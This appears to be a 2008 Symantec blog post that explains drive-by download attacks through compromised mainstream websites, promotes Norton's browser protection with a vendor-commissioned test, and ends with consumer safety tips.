In the old days, practicing “safe Internet” meant staying in the good online neighborhoods so you didn’t get infected. Today, almost any website you visit could be a landmine leading you to having your system compromised.  We all remember the quote from Austin Powers where Dr. Evil says “One MILLION dollars”. Now imagine a techie version of Dr. Evil, let’s call him “Dr. Drive-by” saying in that same tone “One MILLION websites compromised”. Drive-by download outbreaks can be measured in how many occurrences a particular domain name occurs in Google searches. Recent reports from SANS Internet Storm Center and The Register detail millions of potentially infected mainstream websites including news media, retail shopping, hobby forums, gaming, banking, popular social networks, education, government, travel and vacation sites.  In July 2008, Websense reported that “60 percent of the top 100 most popular Web sites either hosted malicious content or contained a masked redirect“. The truth is mainstream websites are being compromised and are subjecting consumers to drive-by downloads on a daily basis.

The what and the how of a drive-by download

So what is a drive-by download? Wikipedia defines it as a “Download of spyware, a computer virus or any kind of malware that happens without knowledge of the user.”  No user interaction is required. You don’t have to click on anything, open up a file, or send any information. Simply navigate to an infected site, and it’s “game over”. Your system has been compromised!  Bad guys can install anything on your system – fake antivirus products to trick you out of money to remove viruses you don’t have, keyloggers to steal your banking and credit card information, and bots to have your system be used to compromise other sites.

Hackers are using automated tools to infect thousands of websites at one time using techniques such as SQL injection to insert any code they want on those sites.  It can be as simple as adding one line of code to a website saying “send any users who visit goodsite to my badsite hosting malicious attack software”  Your system is then attacked by just by visiting the goodsite.  If your system is running a vulnerable browser, ActiveX control, or application such as a multimedia application, then the badsite could add the malware to your system.  The key take away is that the threat landscape has changed considerably in the past few years, and the security software on your system needs to change with it. Simply put, not all antivirus and security products are equal in the ways they protect you.

New protection is required

Protection from today’s threats requires newer proactive protection technologies to address what traditional signature based approaches can’t.  Symantec added new protection technologies to Norton 2008 and soon to be announced 2009 products that provide additional protection against browser vulnerabilities, vulnerable ActiveX controls and multimedia application vulnerabilities.

Symantec commissioned Cascadia Labs to look at the effectiveness of leading paid consumer security products in protecting against today’s real world attacks. Cascadia conducted an independent test using the same methods by which malicious websites attack users PCs and also visited live malicious websites with the security products installed to protect them – some recent reports such as Consumer Reports missed this attack vector in their testing completely.  The results show that Symantec’s Norton Internet Security 2008 provided almost perfect protection – the highest of any other tested product. Cascadia's full report can be found here: http://cascadialabs.com/clients.html

This will be a multi-part blog series looking at more of the techniques the bad guys are using to infect you (misleading applications such as fake codecs, fake antivirus applications, malvertisements), what holes they’re using to get onto your system and what you can do be more safe and secure.

In the meantime, here are a few tips to protect yourself:
• Keep your Operating System, applications, browser and associated plug-ins patched and up to date.
• It still pays to be discerning with which websites you visit, links you click on and applications that you install, even if it’s not a bullet proof defense.
• Run a top rated security suite known for having leading technologies to keep you ahead of today’s threats. Norton Internet 2008 and 2009 have Browser Protection technology built-in to protect against drive-by downloads and other Internet nasties — great incentive for current Norton users to update to the latest versions at no additional cost as part of their subscription!
• Keep a valid subscription to keep security updates coming

John Harrison, aka “Dr. Drive-By”